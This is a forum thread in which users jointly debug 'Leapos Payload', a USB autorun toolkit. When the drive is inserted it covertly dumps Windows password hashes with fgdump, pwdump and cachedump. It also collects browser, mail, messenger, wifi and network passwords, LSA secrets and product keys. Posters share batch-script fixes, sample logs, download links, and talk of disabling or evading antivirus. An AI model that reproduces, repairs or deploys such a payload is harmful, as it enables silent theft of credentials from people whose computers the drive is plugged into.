USB Pocket-Knife Development

Leapo

I extracted everything from the downloaded folder to my usb (not the u3 system the actual usb) and menu.bat is still not functioning properly i.e. not letting me change specifications because it cannot find the specified file so what do i need to do? seriously dont be afraid to dumb it down....alot because i'm still kind of new at this.

• Replies 818
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Posted Images

Ok, found a couple good ones....

First off...

At the top of start.bat you have CD /SYSTEM

Then a little farther down you have:

:: Sets Variables and paths to clean up pathnams later on
IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername%
SET logdir="%flshdrv%\LOGS\%computername%
SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\SYSTEM\")
SET config="%flshdrv%\CONFIG\"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET scriptdir="%flshdrv%\SYSTEM\PROGS\SCRIPT\") ELSE (SET scriptdir=".\SYSTEM\PROGS\SCRIPT\")
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET installdir="%flshdrv%\SYSTEM\INSTALL\") ELSE (SET installdir=".\SYSTEM\INSTALL\")
SET /p eipurl=<"%flshdrv%\CONFIG\External_IP.cfg"
SET U3="%cd%

First, scriptdir isn't used any more, so delete that line.

Second, seeing we're already CDed to \SYSTEM, the lines setting progdir and installdir shouldn't have \system in them in the "else" part of the line.

They should read as:

IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\")
SET config="%flshdrv%\CONFIG\"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET installdir="%flshdrv%\SYSTEM\INSTALL\") ELSE (SET installdir=".\INSTALL\")

This change made all kinds of things start working.

Also,

IF NOT EXIST %config%\Port_Scan.cfg GOTO SkipPortScan
	ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
	ECHO +----------------------------------+ >> %log% 2>&1
	ECHO +            [Port Scan]           + >> %log% 2>&1
		.\portqry -local -l %tmplog% >> %log% 2>&1
		COPY %log%+%tmplog%* %log%  >> NUL
		DEL /f /q %tmplog% >NUL
:SkipPortScan

ECHO. >> %log% 2>&1
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO Leapos Payload [Time Finished: %date% %time%] >> %log% 2>&1

Port Scan hangs for me every time. I checked the docs on portqry and found that we don't need to use the templog copy. I changed it to read as:

IF NOT EXIST %config%\Port_Scan.cfg GOTO SkipPortScan
	ECHO +            [Port Scan]           + >> %log% 2>&1
		.\portqry -local -v -v >> %log% 2>&1
:SkipPortScan

DEL /f /q %tmplog% >NUL

ECHO. >> %log% 2>&1
ECHO Leapos Payload [Time Finished: %date% %time%] >> %log% 2>&1

added "-v -v" for maximum verbosity and moved the DEL tmplog to the bottom to clean that file out (it still was remaining from time to time)

I notice several items hard code .\ instead of using progdir. It doesn't matter for my U3 drives, but that might give you a bit or trouble on your non-U3 ones. (no clue on that as I'm not using non-U3)

I still have a couple individual items not running, but this is on my x64 machine. I'll try them on my non-x64 machines and report back tomorrow.

Later y'all :)

Just noticed this...

With everything turned on except pwdump and the installers I only get one window popping up that says:

"Windows cannot find '.\csrss.exe'. Make sure you typed the name correctly (yada yada yada)"

and it want's me to click ok.

csrss.bat is there, it appears that csrss.exe is not.

Might wanna check on that one.

gives about a trillion errors right now:/

edit:

i found the issue

well 2

first off, the U3 version doesn't have the csrss.exe in folder at all, also its hidden, which somehow didn't let it read it anyway.

so what you should do, just pass it from non U3 to you're system. then flash it.

also still does some issues for me

edit2:

noticed another thing, before it spits like 1000 lines of errors, i notice its aimed on E:(being my U3 Partition)//system/somewhere, 2 slashes, 2 frikkin slashes causing all this crap, so how can i fix this?

edit2:

noticed another thing, before it spits like 1000 lines of errors, i notice its aimed on E:(being my U3 Partition)//system/somewhere, 2 slashes, 2 frikkin slashes causing all this crap, so how can i fix this?

Are you running the U3 version, or the non-U3 version?

Could you post a bit of the generated log file? Say a half dozen lines before and after the error occurs.

I'm uploading a version of the payload with the bugfixes Tmbomber made, which should solve a lot of problems. Also put csrss.exe where it needs to be for the U3 version, as well as fc.exe (which should fix the slurp scripts once and for all).

I still can't figure out why the payload throws No Disk errors on some systems and not on others, by all accounts it should be absolutely fine.

Are you allowing the payload to execute automatically when you insert the thumbdrive, selecting "run payload" from menu.bat, or running start.bat directly from a dos prompt?

When I'm testing I do the first. I found the second had problems. And the third won't work because start.bat is expecting parameters to be passed to it from go.vbs.

I'm allowing it to execute automatically. On my desktop computer it goes off just fine, on my laptop it throws No Disk errors (9 of them in a row). I can't figure out what the difference is...

First off, thanks for the effort to make this a better product.

Now, out of curiosity, does your stick execute if the computer is in lock screen? I built a U3 stick a few months ago (either Switchblade or Hacksaw) but noticed that it doesn't work if the computer is in lock screen. Poking around the MSN site, I read that the auto-run purposely doesn't work if the lock screen is enabled. Not sure if I have an old version that has since been modified to get around this.

Also, is AVKill your program, or did you get it from somewhere else? I'd like to see the source or understand if it is merely a series of net stop {service} or something more detailed. McAfee is proving to be a very formative opponent.

Are you allowing the payload to execute automatically when you insert the thumbdrive, selecting "run payload" from menu.bat, or running start.bat directly from a dos prompt?

When I'm testing I do the first. I found the second had problems. And the third won't work because start.bat is expecting parameters to be passed to it from go.vbs.

first time arround symantec script detector which is from 2003 and i thought i uninstalled my symantec still pops up. and it wasen't updated ever. script is way to detectable, then i ran the script from menu this time, but it does mess any way i do it

This just in,

On my laptop running non-x64 XP I get an exception fault when FGdump runs and I get nine "No Disk" errors when Network services runs...

When I get home I'll try network services without the "b" option (had problems with that before)

This just in,

On my laptop running non-x64 XP I get an exception fault when FGdump runs and I get nine "No Disk" errors when Network services runs...

When I get home I'll try network services without the "b" option (had problems with that before)

So THATS where the errors were getting thrown from! I'll poke around with it and see if I can get netstat to play nice.

By the way, the discrepancies between Windows XP and its 64bit counterpart that you've encounter got me thinking that an OS version check might be a good option to add. It would allow the payload to execute only what will actually work on the OS its running on (meaning the payload could even be made to execute properly on Vista, though it might be feature limited). I'll see what i can do there...

Also, here's the payload with the fixes Tmbomber made on the previous page. As he noted, don't scan for network services and you'll avoid the No Disk errors (If I can get these last couple bugs fixed we'll jump version 1.0 fairly quickly :lol: ).

http://www.megaupload.com/?d=V6DR8HXG

Ummmm.....

Minor one that's been bothering me....

:: Header information
ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
ECHO Leapos Payload [Time Started: %date% %time%] >> %log% 2>&1

Shouldn't that first long line have two ">" before the %log%???

Yeah, I know...

It's just that I fix it every time :)

< edit > Ignore this, it's suppose to only have one >

Concerning network services....

I ran the payload on a Win 2K box and got:

+----------------------------------+ 
+       [Network Services]         + 

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a            Displays all connections and listening ports.
  -e            Displays Ethernet statistics. This may be combined with the -s
                option.
  -n            Displays addresses and port numbers in numerical form.
  -p proto      Shows connections for the protocol specified by proto; proto
                may be TCP or UDP.  If used with the -s option to display
                per-protocol statistics, proto may be TCP, UDP, or IP.
  -r            Displays the routing table.
  -s            Displays per-protocol statistics.  By default, statistics are
                shown for TCP, UDP and IP; the -p option may be used to specify
                a subset of the default.
  interval      Redisplays selected statistics, pausing interval seconds
                between each display.  Press CTRL+C to stop redisplaying
                statistics.  If omitted, netstat will print the current
                configuration information once.

Notice it doesn't list a b option.

I think the OS version detection would be a great idea.

PWdump and FGdump are the ones that seem to have the most trouble with x64. (it crashed when running on Win2K, too)

I'm going to dig into their docs next.

fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]
where Username and Password have administrator credentials

-? displays help (you're looking at it!)
-t will test for the presence of antivirus without actually running the password dumps
-c skips the cache dump
-w skips the password dump
-s performs the protected storage dump
-r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.
-v makes output more verbose. Use twice for greater effect
-k keeps the pwdump/cachedump going even if antivirus is in an unknown state
-l logs all output to logfile
-T runs fgdump with the specified number of parallel threads
-h is the name of the single host to perform the dumps against
-f reads hosts from a line-separated file
-H reads host:username:password from a line-separated file (per-host cr edentials)
-o skips pwdump history dumps
-a will not attempt to detect or stop antivirus, even if it is present

There's fgdump's usage information. The payload has the most resent version. If you type fgdump -? you get a slightly different usage line:

fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]

The "[-O 32|64]" being the important part...

From http://swamp.foofus.net/fizzgig/fgdump/default.htm:

# Better 32/64 bit detection. This is not as easy as it sounds, at least not remotely! If someone has a sure-fire 
way for 100% reliably detecting the target OS, please let me know. In the mean time, if fgdump is unsure, it will 
report it and default to 32-bit.

# The -O [32|64] flag will manually override the target OS architecture. So, for example if fgdump is reporting a 
host as 32-bit and you KNOW it is 64-bit, you can use -O 64 (or vice-versa, of course). Note that this flag will apply 
to ALL hosts you are dumping! You might want to single out any hosts you need to override.

So it tries to autodetect, and if it fails it assumes x32. (bad on my x64 machine)

We also have the current version of pwdump. The docs say we have to set -x set for x64 machines:

You MUST use -x if your target is a 64-bit OS. It DOES NOT MATTER what type of OS you are running FROM,
 only what your TARGET is! pwdump.exe itself is a 32-bit executable, and runs the same from any OS. The service 
and DLL are different depending on 32/64-bit. 

I tried manually executing "pwdump -x 127.0.0.1" in a command prompt window and it worked fine.

On the Win2K machine, cache dump yielded:

+           [Dump Cache]           + 
Service not found. Installing CacheDump Service (E:\SYSTEM\CACHEDUMP.EXE -s)
CacheDump service successfully installed.
Service started.
Service currently active.  Stopping service...
Service successfully removed.

and nothing more. (apparently nothing cached there)

On my normal XP machine I got:

Service not found. Installing CacheDump Service (G:\SYSTEM\CACHEDUMP.EXE -s)
Service started.

So again, nothing cached.

On my x64 machine I got:

Service not found. Installing CacheDump Service (M:\SYSTEM\CACHEDUMP.EXE -s)
Service started.
ERROR Failed to open key SECURITY\Cache in RegOpenKeyEx. Is service running as SYSTEM ? Do you ever log on domain ?  (code 0)

Service currently active.  Stopping service...
ControlService failed to STOP the service.Retry in 2 sec
-

Hmmm... didn't like that.

Manually executing in a dos window it says it's version 1.0 and only lists -v, -vv, & -K as options.

Going off to do some research...

Ok, running this:

ECHO +----------------------------------+ &gt;&gt; %log% 2&gt;&amp;1
	ECHO +         [Dump SAM FGDUMP]        + &gt;&gt; %log% 2&gt;&amp;1
		.\fgdump.exe -vv -c  &gt;&gt; %log% 2&gt;&amp;1
		ECHO. &gt;&gt; %log% 2&gt;&amp;1
		ECHO -----Hashes----- &gt;&gt; %log% 2&gt;&amp;1
		COPY %log%+%progdir%\127.0.0.1.pwdump %log%  &gt;&gt; NUL
	 	DEL /f /q  %progdir%\127.0.0.1* &gt;&gt; %log% 2&gt;&amp;1
	 	DEL /f /q  %progdir%\*.log &gt;&gt; %log% 2&gt;&amp;1
         	DEL /f /q  %progdir%\*.fgdump-log &gt;&gt; %log% 2&gt;&amp;1

Yielded this:

+         [Dump SAM FGDUMP]        + 
fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright© 2008 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.

Error opening output log file 2008-09-20-02-30-20.fgdump-log, disabling further log writing. Error code returned was 5
--- Session ID: 2008-09-20-02-30-20 ---
Error opening output log file 2008-09-20-02-30-20.fgdump-log, disabling further log writing. Error code returned was 5

&gt;&gt; A new worker thread has been created with the ID: 00000e78 &lt;&lt;
Starting dump on 127.0.0.1
Error opening failed output log file 2008-09-20-02-30-20.failed, disabling further log writing. Error code returned was 5

** Beginning local dump **
INFO: skipping cachedump on 127.0.0.1 because 127.0.0.1.cachedump exists or I was told to skip cache dumps
INFO: skipping dump of protected storage secrets on 127.0.0.1 because 127.0.0.1.lsadump exists or I was told to skip LSA dumps
Skipping impersonation (no user provided)
OS (127.0.0.1): Microsoft Windows 2003 Professional Service Pack 2 (Build 3790) (64-bit)
Failed to dump passwords: 

This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.

Terminating thread 00000e78 (lpszServer is NULL)

-----Summary-----

Failed servers:
NONE

Successful servers:

Total failed: 0
Total successful: 1

-----Hashes----- 

Could Not Find M:\SYSTEM\127.0.0.1*
Could Not Find M:\SYSTEM\*.log
Could Not Find M:\SYSTEM\*.fgdump-log

It appears that it's attempting to create the log files on the cd partition. Going to try specifying an output file.

Tried changing directories...

ECHO ----------------------------------------------------------------------------------------------------------------------------- &gt;&gt; %log% 2&gt;&amp;1
	ECHO +         [Dump SAM FGDUMP]        + &gt;&gt; %log% 2&gt;&amp;1

CD &gt;&gt; %log% 2&gt;&amp;1
		CD /D %logdir% &gt;&gt; %log% 2&gt;&amp;1
		%\fgdump.exe -vv -c &gt;&gt; %log% 2&gt;&amp;1
		CD /D % &gt;&gt; %log% 2&gt;&amp;1

ECHO -----Hashes----- &gt;&gt; %log% 2&gt;&amp;1
		COPY %log%+%logdir%\127.0.0.1.pwdump %log%  &gt;&gt; NUL
	 	DEL /f /q  %logdir%\127.0.0.1* &gt;&gt; %log% 2&gt;&amp;1
	 	DEL /f /q  %logdir%\*.log &gt;&gt; %log% 2&gt;&amp;1
         	DEL /f /q  %logdir%\*.fgdump-log &gt;&gt; %log% 2&gt;&amp;1

Yielded this:

+         [Dump SAM FGDUMP]        + 
M:\SYSTEM
The system cannot find the path specified.
The system cannot find the path specified.

-----Hashes----- 

The " CD >> %log% 2>&1" lines are in there to tell the log file what directory I'm in.

They resulted in M:\system every time. So my "CD /D %logdir% >> %log% 2>&1" didn't actually do anything.

< sigh > It's late and I'm tired...

More tomorrow.

still all it does is spit errors, and its automatically detected by antivirus from 2003 that wasent updated once, (cant get rid of it, symantec script blocking)

heres logfile
-----------------------------------------------------------------------------------------------------------------------------
Leapos Payload [Time Started: Sat 09/20/2008 10:06:13.57]
-------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------------
+ [system info] +

Windows IP Configuration

Host Name . . . . . . . . . . . . : MatanLaptop

Primary Dns Suffix . . . . . . . :

Node Type . . . . . . . . . . . . : Unknown

IP Routing Enabled. . . . . . . . : No

WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Wireless Network Connection:

Connection-specific DNS Suffix . :

Description . . . . . . . . . . . : Intel® PRO/Wireless 3945BG Network Connection

Physical Address. . . . . . . . . : 00-18-DE-9E-12-45

Dhcp Enabled. . . . . . . . . . . : Yes

Autoconfiguration Enabled . . . . : Yes

IP Address. . . . . . . . . . . . : 10.0.0.2

Subnet Mask . . . . . . . . . . . : 255.0.0.0

Default Gateway . . . . . . . . . : 10.0.0.138

DHCP Server . . . . . . . . . . . : 10.0.0.138

DNS Servers . . . . . . . . . . . : 10.0.0.138

Lease Obtained. . . . . . . . . . : Saturday, September 20, 2008 10:05:52 AM

Lease Expires . . . . . . . . . . : Saturday, September 20, 2008 11:05:52 AM

+ [External IP] +

+ [Dump Wifi Hex] +
'.\wifike.exe' is not recognized as an internal or external command,
operable program or batch file.
+ [Dump SAM PWDUMP] +
'.\pwdump' is not recognized as an internal or external command,
+ [Dump SAM FGDUMP] +
'.\fgdump.exe' is not recognized as an internal or external command,

-----Hashes-----

+ [Dump Network PW] +
'.\netpass.exe' is not recognized as an internal or external command,
+ [Dump Mail PW] +
'.\mailpv.exe' is not recognized as an internal or external command,
+ [Dump Firefox PW] +
'".\"\FirePassword.exe' is not recognized as an internal or external command,
+ [Dump IE PW] +
'.\iepv.exe' is not recognized as an internal or external command,
+ [Dump Messenger PW] +
'.\mspass.exe' is not recognized as an internal or external command,
+ [Dump Cache] +
'".\"\cachedump.exe' is not recognized as an internal or external command,
+ [Dump LSA secrets] +
'.\pspv.exe' is not recognized as an internal or external command,
+ [Dump Product Keys] +
'".\"\produkey.exe' is not recognized as an internal or external command,
+ [Dump URL History] +
Input Error: Can not find script file "F:\DUH.vbs".
+ [Dump Updates-List] +
'".\"\wul.exe' is not recognized as an internal or external command,
+ [Network Services] +

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 1224
^C

as you can see, it still does 2059503 errors, mostly parse, and cant find logfile temp thingy.
i ran it thew the menu, cant anyway else

Edited by Matessim

I allowed me, to create a little installation pack. I combined U3Customizer and Leapos Payload. There are not much changes by me, just a slight customizations:

Changelog:

- added Gonzor´s start menu, so you can now use a graphical start menu for applications

- added an installation text with a step-by-step installation procedure (often people asked for it)

- added U3Customizer, so it is no more needed, to download seperately

Not so much changed. If you like this style, let me know, if not, just delete it.

I suppose, most of you will not need it. It is more related to the new users.

You can find it here:

http://rapidshare.com/files/146804808/Pock...-865-1.rar.html